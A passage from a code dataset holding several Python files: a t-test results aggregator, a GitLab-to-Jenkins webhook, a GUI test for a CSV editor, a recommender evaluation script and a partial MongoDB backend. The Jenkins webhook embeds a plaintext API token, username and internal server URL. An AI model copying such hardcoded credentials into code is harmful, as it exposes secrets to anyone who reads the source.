aggreg_data = {}\n raw_stats_output_file = os.path.join(output_path, 'raw_t_student_stats.csv')\n has_read_header = False\n with open(raw_stats_output_file, 'r') as fin:\n for line in fin:\n if not has_read_header:\n has_read_header = True\n continue\n line_list = line.split(',')\n\n dataset_name = line_list[0]\n attribute = line_list[1]\n criterion_diff_name = line_list[2]\n criterion_name_1, criterion_name_2 = criterion_diff_name.split(' - ')\n\n if (dataset_name, attribute, criterion_name_1) not in aggreg_data:\n aggreg_data[(dataset_name, attribute, criterion_name_1)] = [0, 0, 0, 0, 0, 0]\n if (dataset_name, attribute, criterion_name_2) not in aggreg_data:\n aggreg_data[(dataset_name, attribute, criterion_name_2)] = [0, 0, 0, 0, 0, 0]\n\n try:\n p_value_w_missing = float(line_list[5])\n if p_value_w_missing <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][0] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][3] += 1\n elif p_value_w_missing >= 1. - single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][3] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][0] += 1\n except ValueError:\n pass\n\n try:\n p_value_wo_missing = float(line_list[8])\n if p_value_wo_missing is not None:\n if p_value_wo_missing <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][1] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][4] += 1\n elif p_value_wo_missing >= 1. - single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][4] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][1] += 1\n except ValueError:\n pass\n\n try:\n p_value_num_nodes = float(line_list[11])\n if p_value_num_nodes is not None:\n if p_value_num_nodes <= single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][2] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][5] += 1\n elif p_value_num_nodes >= 1. - single_sided_p_value_threshold:\n aggreg_data[(dataset_name, attribute, criterion_name_1)][5] += 1\n aggreg_data[(dataset_name, attribute, criterion_name_2)][2] += 1\n except ValueError:\n pass\n\n aggreg_stats_output_file = os.path.join(output_path, 'aggreg_t_student_stats.csv')\n with open(aggreg_stats_output_file, 'w') as fout:\n header = ['Dataset',\n 'Attribute',\n 'Criterion',\n 'Number of times is statistically better with missing values',\n 'Number of times is statistically better without missing values',\n 'Number of times has statistically larger number of nodes',\n 'Number of times is statistically worse with missing values',\n 'Number of times is statistically worse without missing values',\n 'Number of times has statistically smaller number of nodes']\n print(','.join(header), file=fout)\n for keys in sorted(aggreg_data):\n values = map(str, aggreg_data[keys])\n print(','.join([*keys, *values]), file=fout)\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n print('Please include a path to an experiment output folder.')\n sys.exit(1)\n\n main(sys.argv[1].replace(r'\\ ', ' '))\n","sub_path":"t_student.py","file_name":"t_student.py","file_ext":"py","file_size_in_byte":18903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635496325","text":"from mod_python import apache\nfrom mod_python import util\n\nfrom lxml import etree\n\nfrom jenkinsapi import jenkins\nimport json\nimport time\nimport urllib\nimport re\n\nimport logging\nlogging.basicConfig(\n\tfilename='/var/log/gitlab2jenkins/gitlab2jenkins.log',\n\tlevel = logging.DEBUG,\n\tformat='%(asctime)s %(name)s %(filename)s:%(lineno)s %(levelname)s: %(message)s',\n)\n\n# This script connects Gitlab with Jenkins and automatically creates new Jenkins jobs\n# from templates for new branches (currently only release branches, sprint branches and master).\n# See https://redmine/projects/alf/wiki/Continuous_Integration#Automated-Branch-Setup\n\nJENKINS_URL = 'http://jenkins.lan.adytonsystems.com:8080'\nJENKINS_USER = 'jenkins.ci'\nJENKINS_APITOKEN = 'b694f516b0d351ed8b1d72c8258d3aca'\nJENKINS_DESCTEMPLATE = 'Automatically created job for branch %(branch)s of project %(repo)s.'\nJENKINS_DESCTEMPLATE += ' Cloned from template %(template)s.\\n\\n'\nJENKINS_DESCTEMPLATE += 'Do not edit this job!\\nInstead, '\nJENKINS_DESCTEMPLATE += 'edit the template job. Changes to the template will be propagated to all cloned jobs.'\n\nj = None\n\ndef repo(data):\n\t''' Get repo name from Gitlab JSON data. '''\n\treturn data['repository']['name'].lower()\n\ndef branch(data):\n\t''' Get branch name from Gitlab JSON data. '''\n\tref = data['ref']\n\tif ref.startswith('refs/heads/'):\n\t\treturn ref[11:]\n\t# I have no idea if this can happen. Maybe raise an exception?\n\tlogging.error('branch(%s) this should be reached...', ref)\n\treturn ref\n\ndef branch_created(data):\n\t''' Determine from JSON data if a new branch was created. '''\n\treturn int(data['before'], base=16) == 0\n\ndef branch_deleted(data):\n\t''' Determine from JSON data if a branch was deleted. '''\n\treturn int(data['after'], base=16) == 0\n\ndef template_name(kind, data):\n\t''' Get template name for this kind from JSON data. '''\n\treturn 'template-%s-%s' % (kind, repo(data))\n\ndef job_name(kind, data):\n\t''' Get the job name for this kind from JSON data. '''\n\treturn '%s-%s-%s' % (kind, repo(data), branch(data).replace('/', '_'))\n\ndef set_branch(xml, bname):\n\t''' Set the git branch in the given job config XML. '''\n\tfor e in xml.iter(tag=etree.Element):\n\t\tif e.tag == 'hudson.plugins.git.BranchSpec':\n\t\t\tfor child in e:\n\t\t\t\tif child.tag == 'name':\n\t\t\t\t\tchild.text = 'origin/%s' % bname\n\ndef gen_description(b, r, tn, data):\n\t''' Generate a nice description for a job. '''\n\tsubs = {\n\t\t'branch': b,\n\t\t'repo': r,\n\t\t'template': tn,\n\t\t'uri': data['repository']['homepage']\n\t}\n\treturn JENKINS_DESCTEMPLATE % subs\n\ndef set_description(xml, desc):\n\t''' Set the job description in the given job config XML. '''\n\tfor child in xml:\n\t\tif child.tag == 'description':\n\t\t\tchild.text = desc\n\ndef set_enabled(xml):\n\t''' Set a job enabled in the given job config XML. '''\n\tfor child in xml:\n\t\tif child.tag == 'disabled':\n\t\t\tchild.text = 'false'\n\ndef view_for_job(job):\n\t''' Determine the view that the given job is in. '''\n\tlogging.debug('all views: %s', ', '.join(j.views))\n\tfor vname in j.views:\n\t\tif vname in ['All', 'Alle']:\n\t\t\tcontinue\n\t\tview = j.views[vname]\n\t\tlogging.debug('view is %s', view)\n\t\tif view and job in view.get_job_dict():\n\t\t\tlogging.debug('found job %s in view %s', job, view)\n\t\t\treturn view\n\treturn None\n\ndef refresh():\n\t''' Reconnect to Jenkins, needed after creating new jobs. '''\n\tglobal j\n\tj = jenkins.Jenkins(JENKINS_URL, JENKINS_USER, JENKINS_APITOKEN)\n\ndef create_job(jobname, template, repo, branch, data):\n\t''' Create a new job. '''\n\tglobal j\n\tcfg = gen_config(jobname, template, repo, branch, data)\n\tnewjob = j.create_job(jobname, cfg)\n\trefresh()\n\tv = view_for_job(template)\n\tif v:\n\t\tv.add_job(jobname, newjob)\n\treturn newjob\n\ndef gen_config(jobname, template, repo, branch, data):\n\t''' Generate an XML job config. '''\n\tglobal j\n\txml = etree.fromstring(j.get_job(template).get_config().encode('utf-8'))\n\tset_branch(xml, branch)\n\tset_enabled(xml)\n\tset_description(xml, gen_description(branch, repo, template, data))\n\treturn etree.tostring(xml, pretty_print=True)\n\ndef handler(req):\n\t''' The actual request handler. '''\n\tglobal j\n\treq.content_type = 'text/plain'\n\t# see https://gitlab/help/web_hooks\n\trequestdata = req.read()\n\tlogging.debug('request data is %s\\n', requestdata)\n\tdata = json.loads(requestdata)\n\tr = repo(data)\n\tb = branch(data)\n\trefresh()\n\tall_jobs = j.get_jobs()\n\tall_views = j.views\n\n\tif not re.match(r'^r[0-9\\.]+(|-s.+)$', b) and not b.startswith('release-'):\n\t\treq.write('branch is neither release, sprint nor story branch. Ignoring.')\n\t\tlogging.info('Branch in neither release, sprint nor story branch %s in repo %s. Ignoring.\\n' % (b, r))\n\t\treturn apache.OK\n\n\tkinds = ['ci']\n\tif re.match(r'^r[0-9\\.]+(|-s[0-9_]+)$', b):\n\t\tkinds.append('nightly')\n\n\tlogging.info(\"Handling incoming data: %r\\n\" % data)\n\tlogging.info(\"Extracted: repo %s, branch %s\\n\" % (r,b))\n\t# We have two kinds of jobs, ci (continuous integration) and nightly.\n\tfor kind in kinds:\n\t\ttn = template_name(kind, data)\n\t\tjn = job_name(kind, data)\n\t\tlogging.info(\"Will work with template %s, job %s\\n\" % (tn, jn))\n\n\t\tif not j.has_job(tn):\n\t\t\t# If we don't have a template, there is nothing we can do anyways...\n\t\t\tcontinue\n\n\t\tif False and branch_created(data):\n\t\t\tres = \"Registered new branch %s in repo %s\\n\" % (b, r)\n\t\t\tlogging.info(res)\n\t\t\tjob = create_job(jn, tn, r, b, data)\n\t\t\tif kind != 'nightly':\n\t\t\t\tlogging.info('Will invoke this %s job directly.', kind)\n\t\t\t\tjob.invoke()\n\n\t\telif branch_deleted(data):\n\t\t\tres = \"Registered deleted branch %s in repo %s\\n\" % (b, r)\n\t\t\tlogging.info(res)\n\t\t\tif j.has_job(jn):\n\t\t\t\tj.delete_job(jn)\n\t\telse: # Just a regular commit on an existing branch.\n\t\t\tres = \"Registered commit to %s on branch %s\\n\" % (r, b)\n\t\t\tlogging.info(res)\n\t\t\tif not j.has_job(jn):\n\t\t\t\tjob = create_job(jn, tn, r, b, data)\n\t\t\telse:\n\t\t\t\tjob = j.get_job(jn)\n\t\t\t\tjob.update_config(gen_config(jn, tn, r, b, data))\n\t\t\tif kind != 'nightly':\n\t\t\t\tlogging.info('Will invoke this %s job.', kind)\n\t\t\t\tjob.invoke()\n\n\t\treq.write(res)\n\n\treturn apache.OK\n","sub_path":"gitlab2jenkins.py","file_name":"gitlab2jenkins.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474114316","text":"useFixture(RecordEditor)\r\n\r\ndef test():\r\n\tfrom Modules import commonBits\r\n\tjava_recorded_version = '1.6.0_22'\r\n\r\n\tif window('Record Editor'):\r\n\t\tselect('FileChooser', commonBits.sampleDir() + 'csv_DTAR1000_Store_file_std.bin.csv')\r\n\t\tselect('ComboBox1', 'CSV')\r\n\t\tselect('ComboBox2', 'Generic CSV - enter details')\r\n\t\tclick(commonBits.fl('Edit') + '1')\r\n\r\n\t\tif window(''):\r\n\t\t\tselect('BmKeyedComboBox', commonBits.fl('Parser - Quotes based on field Type'))\r\n\t\t\tclick(commonBits.fl('Go'))\r\n\t\tclose()\r\n\r\n\t\tselect('Table', 'cell:2|REGION-NO,0(20)')\r\n\t\trightclick('Table', '3|STORE-NAME,4')\r\n##\t\tselect('Table', 'cell:2|REGION-NO,0(20)')\r\n\t\tselect_menu(commonBits.fl('Edit Record'))\r\n##\t\tselect('Table1', 'cell:2|REGION-NO,0(20)')\r\n\t\tassert_p('Table', 'Content', '[[STORE-NO, 1, , 5, 5], [REGION-NO, 2, , 20, 20], [STORE-NAME, 3, , V Albury, V Albury], [NEW-STORE, 4, , N, N], [ACTIVE-STORE, 5, , Y, Y], [CLOSED-STORE, 6, , N, N], [DC-TYPE, 7, , N, N], [SRC-TYPE, 8, , N, N], [HO-TYPE, 9, , N, N]]')\r\n\t\tassert_p('TextArea', 'Text', '5\t20\t\"V Albury\"\t\"N\"\t\"Y\"\t\"N\"\t\"N\"\t\"N\"\t\"N\"')\r\n\t\tselect('Table', 'N 1', commonBits.fl('Data') + ',3')\r\n\t\tselect('Table', 'Y 2', commonBits.fl('Data') + ',4')\r\n\t\tselect('Table', 'N 3', commonBits.fl('Data') + ',5')\r\n\t\tselect('Table', 'cell:' + commonBits.fl('Data') + ',6(N)')\r\n\t\tassert_p('Table', 'Content', '[[STORE-NO, 1, , 5, 5], [REGION-NO, 2, , 20, 20], [STORE-NAME, 3, , V Albury, V Albury], [NEW-STORE, 4, , N 1, N 1], [ACTIVE-STORE, 5, , Y 2, Y 2], [CLOSED-STORE, 6, , N 3, N 3], [DC-TYPE, 7, , N, N], [SRC-TYPE, 8, , N, N], [HO-TYPE, 9, , N, N]]')\r\n\t\tselect('Table', 'cell:' + commonBits.fl('Data') + ',6(N)')\r\n\t\tassert_p('TextArea', 'Text', '5\t20\t\"V Albury\"\t\"N 1\"\t\"Y 2\"\t\"N 3\"\t\"N\"\t\"N\"\t\"N\"')\r\n\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/linux_HSQLDB_Edit/TestCases/V69_Changes/Csv/CsvQuoteTextFields.py","file_name":"CsvQuoteTextFields.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602523740","text":"import argparse\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport time\r\nimport natsort\r\nfrom pymediainfo import MediaInfo\r\n\r\ndef get_ids(idpath):\r\n ids = dict();\r\n for line in open(idpath):\r\n tid = line.strip();\r\n ids[tid] = len(ids);\r\n return ids;\r\n\r\ndef get_ivt(idpath):\r\n ivt = dict();\r\n for line in open(idpath):\r\n tid = line.strip();\r\n ivt[len(ivt)] = tid;\r\n return ivt;\r\n\r\ndef get_mat(mpath, mids):\r\n mat = None;\r\n lines = open(mpath).readlines();\r\n for mid in mids:\r\n terms = lines[mids[mid]].strip().split(' ');\r\n if mat is None:\r\n mat = np.zeros((len(mids), len(terms)), dtype=np.float32);\r\n for k in range(len(terms)):\r\n mat[mids[mid], k] = np.float32(terms[k]);\r\n return mat;\r\n\r\ndef get_history(hpath):\r\n rated = dict();\r\n popular = dict();\r\n for line in open(hpath):\r\n terms = line.strip().split(',');\r\n uid = terms[0];\r\n rated[uid] = set();\r\n for k in range(1, len(terms)):\r\n vid = terms[k].split(':')[0];\r\n like = int(terms[k].split(':')[1]);\r\n rated[uid].add(vid);\r\n if like == 1:\r\n if vid not in popular:\r\n popular[vid] = 0;\r\n popular[vid] += 1;\r\n return rated, popular;\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description=\"Evaluate weighted matrix factorization based methods.\")\r\n parser.add_argument('-d', '--data', required=True, help=\"The data path for the evaluation\");\r\n parser.add_argument('-m', '--model', required=True, help=\"The work path for the model\");\r\n parser.add_argument('-f', '--fold', type=int, default=0, help=\"The index of evaluation fold\");\r\n parser.add_argument('-s', '--step', type=int, default=5, help=\"The number of evaluation step\");\r\n parser.add_argument('-t', '--total', type=int, default=30, help=\"The number of total predictions\");\r\n parser.add_argument('-sl', '--scenarios', nargs='+', default=None, help=\"The test scenario list\");\r\n args = parser.parse_args();\r\n \r\n uids = get_ids(os.path.join(args.data, 'uid'));\r\n vids = get_ids(os.path.join(args.data, 'vid'));\r\n fold = args.fold;\r\n scenarios = args.scenarios;\r\n step = args.step;\r\n total = args.total;\r\n interval = total // step;\r\n results = dict();\r\n\r\n rated, popular = get_history(os.path.join(args.data, 'f%dtr.txt'%fold));\r\n umat = get_mat(os.path.join(args.model, 'final-U.dat'), uids);\r\n vmat = get_mat(os.path.join(args.model, 'final-V.dat'), vids);\r\n bmat = None;\r\n if os.path.exists(os.path.join(args.model, 'final-B.dat')):\r\n bmat = get_mat(os.path.join(args.model, 'final-B.dat'), vids)\r\n for scenario in scenarios:\r\n teids = get_ids(os.path.join(args.data, 'f%dte.%s.idl'%(fold, scenario)));\r\n teivt = get_ivt(os.path.join(args.data, 'f%dte.%s.idl'%(fold, scenario)));\r\n temat = np.zeros((len(teids), vmat.shape[1]), dtype=np.float32);\r\n for vid in teids:\r\n temat[teids[vid],:] = vmat[vids[vid],:];\r\n scores = np.dot(umat, temat.T);\r\n if bmat is not None:\r\n scores += bmat.reshape((1,-1));\r\n rlist = np.argsort(scores, axis=1);\r\n tresults = [0.0]*interval;\r\n tcount = 0;\r\n for line in open(os.path.join(args.data, 'f%dte.%s.txt'%(fold, scenario))):\r\n terms = line.strip().split(',');\r\n uid = terms[0];\r\n likes = set();\r\n idx = 0;\r\n for k in range(1, len(terms)):\r\n vid = terms[k].split(':')[0];\r\n like = int(terms[k].split(':')[1]);\r\n if like == 1:\r\n likes.add(teids[vid]);\r\n if len(likes) != 0:\r\n hits = [0] * interval;\r\n for t in range(len(teids)):\r\n liid = rlist[uids[uid], len(teids)-t-1];\r\n if teivt[liid] not in rated[uid]:\r\n if liid in likes:\r\n j = idx // step;\r\n for k in range(j, interval):\r\n hits[k] += 1;\r\n idx += 1;\r\n if idx == total:\r\n break;\r\n for k in range(interval):\r\n tresults[k] += hits[k];\r\n tcount += len(likes);\r\n if scenario not in results:\r\n results[scenario] = [0.0]*interval;\r\n for k in range(interval):\r\n results[scenario][k] += tresults[k] / tcount;\r\n for scenario in scenarios:\r\n line=scenario\r\n for k in range(interval):\r\n line += ',%.6f'%(results[scenario][k]);\r\n print (line);\r\n\r\nif __name__ == '__main__':\r\n main();\r\n\r\nTestData=\"Test\"\r\nwhile True:\r\n for(direcpath,direcnames,vid_files) in os.walk(TestData):\r\n for v_file in vid_files:\r\n if '.txt' in v_file:\r\n time.sleep(1)\r\n with open(TestData + \"/\" + v_file , 'r') as myfile:\r\n video_id = myfile.read()\r\n data = video_id\r\n data_dir = \"/Users/masoodkhan/Desktop/Project_PVR_using_RC_from_videos/videos\"\r\n files = os.listdir(data_dir)\r\n files = natsort.natsorted(files)\r\n print(\"Top_of K-Recommendation vid:\")\r\n for i in range(len(files)):\r\n file = files[i]\r\n d = file.split(',')\r\n vid = data\r\n b = [s.split(',') for s in d]\r\n if vid in d:\r\n path = data_dir + \"/\" + vid\r\n media_info = MediaInfo.parse(path)\r\n for track in media_info.tracks:\r\n if track.track_type == 'Video':\r\n res = track.width * track.height\r\n data_dir_a = data_dir\r\n files_a = os.listdir(data_dir_a)\r\n files_a = natsort.natsorted(files_a)\r\n for i in range(len(files_a)):\r\n file = files_a[i]\r\n filepath = data_dir_a + \"/\" + file\r\n prefix = file.split('.')[0]\r\n if os.path.isfile(filepath):\r\n media_info = MediaInfo.parse('videos/' + file)\r\n for track in media_info.tracks:\r\n if track.track_type == 'Video':\r\n data_vid_resulation = track.width * track.height\r\n user_vid_resulation = str(res)\r\n all_data_vid_resu = str(data_vid_resulation).split(',')\r\n new_res = user_vid_resulation\r\n resulation_a = [s.split(',') for s in all_data_vid_resu]\r\n if new_res in all_data_vid_resu:\r\n Recommend_vid = file\r\n print(Recommend_vid)\r\n rec = open(\"vid_send.txt\",\"a\")\r\n print(Recommend_vid,file = rec)\r\n rec.close()\r\n #else:\r\n #print(\"not_match_datafile\")\r\n\r\n #------------------------------------------------------------------------------------------#\r\n os.remove(TestData+'/'+v_file)\r\n \r\n\r\n \r\n\r\n","sub_path":"final_display_module_3.py","file_name":"final_display_module_3.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368531207","text":"from .db_basic import dbinit, insert_one, insert_many, find, findCount, find_one, update_one, update_many, copy_database, drop_database, delete_one, check_collection_count, aggregate\nimport json\nimport pymongo\nfrom bson import json_util\nfrom utilities.jwtTools import createJWT, verifyJWT\nfrom myExceptions import AccountNotExistError,PasswordMismatchError\nimport time\n\n# 数据库结构概览:\n# 数据库: keywordsManagement\n# ->表: User ,存储账户信息\n# ->表: Project, 存储项目概要信息,但不包含分类信息\n# 数据库: 项目x: 每个项目一个数据库,每个数据库包含如下表\n# ->表: Categories\n# ->表: Urls\n# ->表: Articles\n# ->表: BasicWords\n# ->表: ExtendedWords\n# ->表: stopDict\n# ->表: invalidDict\n# ->表: userDict\n\n# 数据库部分初始化操作\ndbinit()\ndbPrefix = 'KWM'\n\n# Projects 相关 高级 函数\nasync def fetchAllProjects(currentpage=1, pagesize=10):\n # 1- 获取 Project表内容\n result1 = await fetchTable(dbPrefix, 'Project', currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print('result1',result1)\n # result1 形式: result1 = {'count':count,'content':content}\n # 2- 因为category 跟 表 Project 是分开的,所以需要分开查找\n if result1['count'] > 0:\n # 存在项目,才去读项目中的 目录信息\n for project in result1['content']:\n # print('project',project)\n projectId = project['_id']['$oid']\n result2 = await fetchTable(dbPrefix + '-' + projectId, 'Categories', currentpage=0, pagesize=0, returnTotalCount=False)\n # print('xxxxxx',result2)\n project['categories'] = result2['content']\n return result1\n\n\nasync def createnewproject(dbName, collectionName, projectObjectData, currentpage=1, pagesize=10):\n # 1- 在Project表添加新项目,如果已经存在,则报错返回\n categotiesData = projectObjectData.pop('categories')\n try:\n result1 = await insert_one(dbName, collectionName, projectObjectData)\n except Exception as e:\n raise\n else:\n # 插入项目名称 成功\n #print('result1', result1)\n # 2-项目创建成功,则创建以该项目命名的数据库,并将Categories 写入 Categories 表格\n # dbName2 = projectObjectData['projectName']\n # 使用uuid代表真正的项目名称,并创建项目\n dbName2 = str(result1)\n #print('dbName2', dbName2)\n result2 = ''\n if len(categotiesData) > 0:\n # 只有设置了目录元素的时候才进行插入,否则,什么都不做\n # print('dbName2',dbName2)\n try:\n result2 = await insert_many(dbPrefix + '-' + dbName2, 'Categories', categotiesData)\n except Exception as e:\n raise\n #print('result2', result2)\n else:\n result2 = 0\n #print('result2', result2)\n # 如果都成功,返回 新的数据\n return await fetchAllProjects(currentpage=currentpage, pagesize=pagesize)\n\n\nasync def fetchTable(dbName, collectionName, idPrefix=\"\", xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n if returnTotalCount:\n # 1 读取所有项目数目\n result1 = await findCount(dbName, collectionName, xfilter)\n # 此处 result1 肯定是个数字, 0 或者 >0\n else:\n result1 = ''\n\n # 2 读取所有的表信息\n result2 = []\n if (type(result1) == int and result1 > 0) or result1 == '':\n # 1-1: 存在数据,则继续下一步 1-2: 没有计算长度 ,也进入下一步。 否则,直接返回空\n skipValue = (currentpage - 1) * pagesize\n limitValue = pagesize\n result2 = json.loads(await find(dbName, collectionName, xfilter=xfilter, xshown=xshown, xsort=xsort, skipValue=skipValue, limitValue=limitValue))\n # 添加 ID\n initID = 1\n if idPrefix == '':\n for ele in result2:\n ele['id'] = skipValue + initID\n initID += 1\n else:\n # id 西药添加特定前缀\n for ele in result2:\n ele['id'] = str(idPrefix) + '-' + str(skipValue + initID)\n initID += 1\n # print('xxxx',result2)\n return ({'count': result1, 'content': result2})\n\n\nasync def updateProject(dbName, collectionName, queryDict={}, setDict={},currentPage=1, pageSize=10):\n # print(setDict)\n # 1- 更新特定醒目名称信息\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n # 修改 项目数据库列表成功\n return await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n\n\n\nasync def deleteProject(dbName, collectionName, queryDict={},currentPage=1,pageSize=10):\n projectId = queryDict['_id']\n # 1: 删除项目列表中的 项目名称\n result1 = await delete_one(dbName, collectionName, queryDict)\n if result1 == 1:\n # step1 修改成功\n # 2: 删除项目数据库\n projectid = json.loads(json_util.dumps(projectId))['$oid']\n result2 = await drop_database(dbPrefix + '-' + projectid)\n if not result2:\n # 删除数据库成功\n # 3- 拉取所有数据\n result3 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result3)\n else:\n return ('error')\n else:\n return ('error')\n\n\nasync def updateCategory(dbName, collectionName, queryDict={}, setDict={},currentPage = 1, pageSize= 10):\n # 更新特定项目中的 目录\n # 1- 更新 对应项目,分类表中的数据\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n if result1 == 1:\n # 1- 修改 项目数据库列表成功\n # 2- 拉取所有数据\n result2 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result2)\n else:\n pass\n\nasync def deleteCategory(dbName, collectionName, queryDict={},currentPage=1,pageSize=10):\n # 1: 删除项目列表中的 项目名称\n try:\n result1 = await delete_one(dbName, collectionName, queryDict=queryDict)\n except:\n raise\n else:\n result2 = await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n return (result2)\n\nasync def createCategory(dbName, collectionName, setDict={},currentPage=1,pageSize=10):\n # 创建 目录\n try:\n result1 = await insert_one(dbName, collectionName, data = setDict)\n except:\n raise\n else:\n # 创建成功,刷新所有 projects信息\n return await fetchAllProjects(currentpage=currentPage, pagesize=pageSize)\n\nasync def handleSignup(dbName, collectionName, accountInfo):\n \"\"\"\n 处理用户注册\n \"\"\"\n\n # 1 - 直接注册,父函数 根据结果,做出相应 判断\n try:\n result1 = await insert_one(dbName, collectionName, accountInfo)\n except:\n raise\n else:\n return ('注册成功')\n\n\nasync def handleSignin(dbName, collectionName, accountInfo):\n \"\"\"\n 处理用户登录\n \"\"\"\n # 1 检查账号是否存在\n try:\n result1 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account']})\n except:\n raise\n else:\n if result1 == 'null':\n # 账号不存在,抛出异常\n raise AccountNotExistError(f'账号{accountInfo[\"account\"]}未注册!')\n else:\n # 用户已经注册,继续向下\n # 2- 如果存在,检查账号密码是否一致\n try:\n result2 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account'], 'shadow': accountInfo['shadow']})\n except:\n raise\n else:\n if result2 == 'null':\n # 账号密码不一致:密码错误\n raise PasswordMismatchError(f'账号{accountInfo[\"account\"]}密码错误,请重试!')\n else:\n # 3- 密码正确, 继续,获取用户部门信息\n try:\n result3 = await find_one(dbName, collectionName, queryDict={'account': accountInfo['account']}, showDict={'_id': 0, 'department': 1})\n except:\n raise\n else:\n # 部门信息ok,生成JWT\n try:\n jwttoken = await createJWT({'name': accountInfo['account']})\n except:\n raise\n else:\n return ({\"username\": accountInfo['account'], \"access_token\": str(jwttoken, 'utf-8'), \"token_type\": \"bearer\", \"department\": json.loads(result3)['department']})\n\n\n# Urls related high level functions\nasync def createUrlItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n print('no error')\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n # else:\n # return(result1)\n\n# async def createUrlItems(dbName, collectionName, ItemInfos):\n# # 直接使用 insert_many\n# result1 = await insert_many(dbName, collectionName, ItemInfos)\n# if isinstance(result1, int):\n# print('插入成功')\n# # 获取所有数据(首页) 返回\n# # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n# result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True)\n# return (result2)\n# else:\n# return('error')\n\n# async def updateUrlItems(dbName,collectionName,queryDict={},setDict={}):\n# #print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n#\n\n\nasync def updateUrlItems(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print('++++++++++++++', dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n # print('result1',result1)\n if result1 == 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n else:\n return(result1)\n\n\nasync def findProjectIdFromProjectName(dbName, collectionName, queryDict={}, showDict={}):\n print('queryDict', queryDict)\n result1 = json.loads(await find_one(dbName, collectionName, queryDict, showDict))\n # print('result1',result1)\n if result1:\n projectId = result1['_id']['$oid']\n return projectId\n else:\n return None\n\n\nasync def fetchUrlItems(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def deleteUrlItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def getCategories(dbName, collectionName):\n print(dbName, collectionName)\n try:\n result = await fetchTable(dbName, collectionName, xshown={'_id': 0, 'categoryName': 1}, returnTotalCount=False, currentpage=0, pagesize=0)\n except:\n raise\n else:\n return(result)\n\n\"\"\"\n停止词,用户词和无效词共用部分\n\"\"\"\n\nasync def fetchDictItems(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中��合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def createDictItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except:\n raise\n else:\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, 